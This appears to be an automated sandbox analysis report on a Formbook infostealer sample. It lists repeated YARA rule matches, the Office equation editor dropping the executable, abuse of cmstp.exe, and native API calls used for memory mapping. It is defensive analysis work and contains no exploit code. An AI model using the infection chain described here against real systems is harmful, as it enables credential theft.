Malicious sample detected (through community Yara rule)
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
Uses a Windows Living Off The Land Binaries (LOL bins)
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Yara signature match
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Document has an unknown application name
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02023040 7_2_02023040
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0203905A 7_2_0203905A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0209D06D 7_2_0209D06D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201E0C6 7_2_0201E0C6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020C2622 7_2_020C2622
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0206A634 7_2_0206A634
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02024680 7_2_02024680
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202E6C1 7_2_0202E6C1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A579A 7_2_020A579A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202C7BC 7_2_0202C7BC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020557C3 7_2_020557C3
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A443E 7_2_020A443E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0205D47D 7_2_0205D47D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02055485 7_2_02055485
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02031489 7_2_02031489
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202351F 7_2_0202351F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02066540 7_2_02066540
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A05E3 7_2_020A05E3
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0203C5F0 7_2_0203C5F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020D3A83 7_2_020D3A83
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02047B00 7_2_02047B00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020CCBA4 7_2_020CCBA4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020ADBDA 7_2_020ADBDA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201FBD7 7_2_0201FBD7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202C85C 7_2_0202C85C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0204286D 7_2_0204286D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0209F8C4 7_2_0209F8C4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020BF8EE 7_2_020BF8EE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A394B 7_2_020A394B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A5955 7_2_020A5955
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020C098E 7_2_020C098E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020229B2 7_2_020229B2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020369FE 7_2_020369FE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02052E2F 7_2_02052E2F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0203EE4C 7_2_0203EE4C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02030F3F 7_2_02030F3F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0204DF7C 7_2_0204DF7C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020BCFB1 7_2_020BCFB1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02092FDC 7_2_02092FDC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02050D3B 7_2_02050D3B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202CD5B 7_2_0202CD5B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020BFDDD 7_2_020BFDDD
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AD22F 7_2_000AD22F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AC94E 7_2_000AC94E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00098C6B 7_2_00098C6B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00098C70 7_2_00098C70
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00092D90 7_2_00092D90
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00092FB0 7_2_00092FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00ABE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00B2F970 appears 84 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00B03F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00ABDF5C appears 121 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00B0373B appears 245 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0208F970 appears 84 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0201DF5C appears 121 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0206373B appears 245 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 02063F92 appears 132 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0201E2A8 appears 38 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004185D0 NtCreateFile, 5_2_004185D0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00418680 NtReadFile, 5_2_00418680
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00418700 NtClose, 5_2_00418700
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004187B0 NtAllocateVirtualMemory, 5_2_004187B0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004185CA NtCreateFile, 5_2_004185CA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004186FA NtClose, 5_2_004186FA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004187AA NtAllocateVirtualMemory, 5_2_004187AA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB00C4 NtCreateFile,LdrInitializeThunk, 5_2_00AB00C4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0078 NtResumeThread,LdrInitializeThunk, 5_2_00AB0078
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00AB0048
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB07AC NtCreateMutant,LdrInitializeThunk, 5_2_00AB07AC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF9F0 NtClose,LdrInitializeThunk, 5_2_00AAF9F0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF900 NtReadFile,LdrInitializeThunk, 5_2_00AAF900
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00AAFAE8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00AAFAD0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00AAFBB8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00AAFB68
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00AAFC90
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00AAFC60
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFD8C NtDelayExecution,LdrInitializeThunk, 5_2_00AAFD8C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00AAFDC0
